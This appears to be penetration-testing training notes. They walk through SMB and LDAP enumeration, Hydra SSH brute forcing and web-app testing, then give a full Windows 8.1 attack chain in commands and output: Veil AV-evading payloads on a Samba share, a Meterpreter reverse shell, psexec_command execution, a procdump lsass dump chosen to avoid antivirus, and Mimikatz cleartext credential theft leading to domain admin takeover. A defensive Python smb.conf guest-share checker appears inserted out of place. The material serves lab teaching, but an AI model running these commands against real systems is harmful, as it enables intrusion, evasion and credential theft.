sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139 <host>

(Requires any access higher than anonymous; guests, users, or administrators are
all able to perform this request on Windows 2000, XP, 2003, and Vista.)

Shares Enumerations: (OPTIONAL) If you fancy creating additional ‘open’ shares
with some Reports/XLS mock files etc.

Finding open shares is useful to a penetration tester because there may be private
files shared, or, if a share is writable, it could be a good place to drop a Trojan
or to infect a file that's already there. Knowing where the share is could make those
kinds of tests more useful, except that determining where the share is requires
administrative privileges already.

Running NetShareEnumAll will work anonymously against Windows 2000, and requires a
user-level account on any other Windows version.

Calling NetShareGetInfo requires an administrator account on all versions of Windows
up to 2003, as well as Windows Vista and Windows 7 if UAC is turned down.

Even if NetShareEnumAll is restricted, attempting to connect to a share will always
reveal its existence. So, if NetShareEnumAll fails, a pre-generated list of shares,
based on a large test network, is used. If any of those succeed, they are recorded.

Enumeration of Users

From a pen-testers perspective, retrieving the list of users on any given server
creates endless possibilities.

Users are enumerated in two different ways (SAMR enumeration or LSA


bruteforcing) by using this script and in most permissive Pen Testing the default
configuration (which is using both) will suffice.

Full information regarding these two enumeration techniques can be found here:
http://nmap.org/nsedoc/scripts/smb-enum-users.html

Credit for pioneering some of the techniques used by this script goes to the enum.exe, sid2user.exe and user2sid.exe programs, which illustrated SID/RID walking techniques and gave added insight into how Microsoft Windows handled Null Sessions in the past, allowing anonymous users to make calls to functions such as QueryDisplayInfo, which returns a detailed list of users, along with descriptions, types, and full names.

This type of enumeration was also used to determine whether users have recently changed their passwords or the date of the last update, whether their accounts are blocked, or even whether they have never logged into the system, etc.

This is useful information for a Pen Tester (and attackers) to target certain accounts when starting password guessing or password brute forcing attacks.

Duration of activity: 20 minutes

Further Reading
http://www.sans.org/reading-room/whitepapers/testing/scanning-windows-deeper-nmap-scanning-engine-33138

Advanced Enumerations

LDAP Enumeration using NMAP Scripts

LDAP Brute Force (only for reference)

nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <host>

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' <host>

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows *Server*",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' <host>

Attempts to perform an LDAP search and returns all matches.

If no username and password are supplied to the script, the Nmap registry is consulted. If the ldap-brute script has been selected and it found a valid account, this account will be used. If not, an anonymous bind will be used as a last attempt.

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ld@pt3st,ldap.qfilter=users,ldap.attrib=sAMAccountName' 172.16.204.145

Activity / Apply enumeration techniques learnt with Windows boxes against *nix systems
(Optional - Create two accounts trivially bruteforceable on the Linux box)

Wordlists in Kali Linux

root@kali:/usr/share/wordlists# ls -al
total 52128
drwxr-xr-x 2 root root 4096 Feb 10 11:23 .
drwxr-xr-x 452 root root 16384 Feb 10 11:30 ..
lrwxrwxrwx 1 root root 25 Feb 10 11:23 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root 30 Feb 10 11:23 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root 35 Feb 10 11:23 dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
lrwxrwxrwx 1 root root 41 Feb 10 11:23 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root 45 Feb 10 11:23 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root 46 Feb 10 11:23 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root 51 Feb 10 11:23 metasploit-jtr -> /usr/share/metasploit-framework/data/john/wordlists
lrwxrwxrwx 1 root root 39 Feb 10 11:23 metasploit-pro -> /opt/metasploit/apps/pro/data/wordlists
lrwxrwxrwx 1 root root 41 Feb 10 11:23 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 53357341 Mar 3 2013 rockyou.txt.gz
lrwxrwxrwx 1 root root 34 Feb 10 11:23 sqlmap.txt -> /usr/share/sqlmap/txt/wordlist.txt
lrwxrwxrwx 1 root root 57 Feb 10 11:23 termineter.txt -> /usr/share/termineter/framework/data/smeter_passwords.txt
lrwxrwxrwx 1 root root 29 Feb 10 11:23 webslayer -> /usr/share/webslayer/wordlist
lrwxrwxrwx 1 root root 25 Feb 10 11:23 wfuzz -> /usr/share/wfuzz/wordlist

Hydra example
hydra -l msfadmin -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://172.16.204.142

Activity / Basic Web Application Pen Testing

Basic Cross-Site Scripting identification, SQLi and CSRF

Set up Burp Proxy (or Fiddler)

http://portswigger.net/burp/download.html
http://portswigger.net/burp/burpsuite_free_v1.6.jar

http://www.telerik.com/fiddler

The idea of these basic exercises is to set up Burp Proxy so as to identify these common vulnerabilities in a vulnerable web site.

If there is Internet access, students can also work over the following URL:
https://google-gruyere.appspot.com/start

Please familiarise yourself with the following scenarios:

https://google-gruyere.appspot.com/part2#2__xss_challenge
https://google-gruyere.appspot.com/part3#3__cross_site_request_forgery

Google Gruyere is also installed in our Web App Virtual Environment.

TRAINER CHECKS:
Open these web apps and familiarise yourself with the examples and exploits.
If network and time allow, show a full exploitation of an XSS bug by stealing someone's credentials.

The duration of this activity should be no longer than 30 minutes. It usually takes time for inexperienced web app testers to set up the required environment.

XSS and SQLi vulnerabilities can be identified even without specific tools, by observing the web app's behaviour and inspecting the client-side source code.

Tools that can be used instead of Burp Suite are:

- Fiddler Debugger (Windows only)
- Paros Proxy (Java)
- WebScarab (Java)
- Burp Proxy (Java)

Windows 8 Pen Test attack scenarios:

1) Obtaining a Remote Shell on Windows 8.1 using the Metasploit "psexec_command" module, created by Royce Davis (@r3dy__), from Accuvant LABS.

a) Bruteforce the password for the domain account john.smith (which is a Local Admin) on the Windows 8 system using Metasploit's SMB login checker module.

Figure 12 - Metasploit Brute Force SMB example

#msf > use auxiliary/scanner/smb/smb_login
#msf auxiliary(smb_login) > set PASS_FILE '/home/user/password'

b) Creating an Antivirus-safe (AV-safe) executable to deploy to our target using Veil-Evasion on Kali Linux. After we have an executable, we simply create an SMB share for our targets to access.

c) Add this section to "/etc/samba/smb.conf" on your Kali Linux distribution (OPT-Kali-Linux-1.1.0-vm-486 is configured with Veil and Samba already):

[payloads$]
comment = Payloads
path = /root/veil-output/compiled
browseable = yes
read only = yes
guest ok = yes
public = yes

d) Samba on Kali Linux is not running by default, so we need to start it:

root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.

e) Next, we start up Metasploit and open a listener:

root@kali:~# msfconsole

msf> use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.0:443
msf exploit(handler) > [*] Starting the payload handler...

f) Now, we set up "psexec_command" and configure the module to run the executable payload directly from our SMB share:

msf exploit(handler) > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set COMMAND start ////192.168.81.196//payloads$//PECBpt.exe
COMMAND => start //192.168.81.196/payloads$/PECBpt.exe
msf auxiliary(psexec_command) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(psexec_command) > set SMBPass P@ssw0rd!!
SMBPass => P@ssw0rd!!
msf auxiliary(psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(psexec_command) > exploit

Figure 13 - Full exploitation on Windows 8.1
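The share added in step c) is deliberately guest-accessible. As an added defender-side check (not part of the original notes or of Samba), the following Python parses a constructed smb.conf containing that [payloads$] section and reports every share an anonymous user can read or write, folding Samba's synonyms (public, writable/writeable) and its case- and whitespace-insensitive parameter names into one canonical form:

```python
# Constructed smb.conf: the [payloads$] share from the notes plus two others.
SAMPLE_SMB_CONF = """\
[payloads$]
comment = Payloads
path = /root/veil-output/compiled
browseable = yes
read only = yes
guest ok = yes
public = yes
[homes]
   Read Only = no
[drop]
   path = /srv/drop
   guest ok = yes
   writable = yes
"""

# Samba ignores case and whitespace in parameter names and accepts synonyms.
SYNONYMS = {"public": "guestok", "writeable": "writable"}
TRUE = {"yes", "true", "1"}

def parse_smb_conf(text):
    """Return {share: {param: value}}; 'writable' is folded into 'readonly'."""
    shares, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            shares[current] = {}
        elif "=" in line and current is not None:
            key, val = (p.strip().lower() for p in line.split("=", 1))
            key = key.replace(" ", "")
            key = SYNONYMS.get(key, key)
            if key == "writable":  # inverse of 'read only'
                key, val = "readonly", ("no" if val in TRUE else "yes")
            shares[current][key] = val
    return shares

def guest_shares(text):
    """Return [(share, 'read'|'write')] for shares reachable without a password."""
    findings = []
    for name, params in parse_smb_conf(text).items():
        if name.lower() == "global" or params.get("guestok") not in TRUE:
            continue
        mode = "write" if params.get("readonly", "yes") not in TRUE else "read"
        findings.append((name, mode))
    return findings
```

Running guest_shares(SAMPLE_SMB_CONF) reports payloads$ as anonymously readable and drop as anonymously writable; a share with neither guest ok nor public set is not reported.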

Figure 14 - Using Veil Framework on Kali Linux

To install Veil Framework on a fresh Kali Linux type: apt-get install veil

2) Obtaining Shell access using PSEXEC

a) Bruteforce the password for the domain account john.smith (which is a Local Admin) on the Windows 8 system using Metasploit's SMB login checker module.

2. Copy PsExec and Procdump over to the target machine using the credentials just discovered. Use mount (*nix) or net use (Windows) to mount the folder and then copy the files over.
*nix: mount -t cifs //target/C$ /mnt/target -o username=adminuser,password=password,domain=targetdomain
Windows: net use e: \\target\C$ password /user:domain\adminuser

3. Log in to the system using Terminal Services and get a command shell. The user john.smith is a local admin; however, to get a process dump of the lsass.exe process a SYSTEM user is required. The following command should be used to get a SYSTEM shell:
psexec -i -s -d cmd

Do a 'whoami' to confirm that it worked before continuing.

4. Run the following procdump command to dump the lsass.exe process memory. Using this method, no 'hacking tools' are uploaded to the target machine, which avoids triggering AV:

procdump.exe -accepteula -ma lsass.exe target.dmp

5. Copy the output dump file back over the mount point created in step 2, and launch Mimikatz locally. Remember to use the same architecture (x86 or x64) as the system the process dump came from. Use the following commands within Mimikatz to get cleartext passwords from the process dump:

mimikatz # sekurlsa::minidump target.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords

Authentication Id: 0; 141237
User Name: sekur_000
Domain: WINDOWS-8
msv:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* LM: d0e9aee149655a6075e4540af1f22d3b
* NTLM: cc36cf7a8514893efccd332446158b1a
tspkg:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
WDigest:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
livessp:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
kerberos:
ssp:

6. This should reveal the password of a domain admin account, which can then be used to log in to the DC and gain control over it.

Note for trainers:

The most reliable way to ensure the Windows 8 system will have the cached password of a domain admin account is to map a share from the DC using the domain admin credentials (jack.russell).

If you need to activate the local Administrator account on Windows 8.1 (it comes deactivated by default on fresh installs), type the following:

C:\> net user administrator /active:yes

(Remember to run the command line as an Administrator.)

Other alternatives to PsExec would be using WMI to run commands remotely, though advanced Windows Pen Testing and exploitation techniques will be covered in more specialised courses in the future.
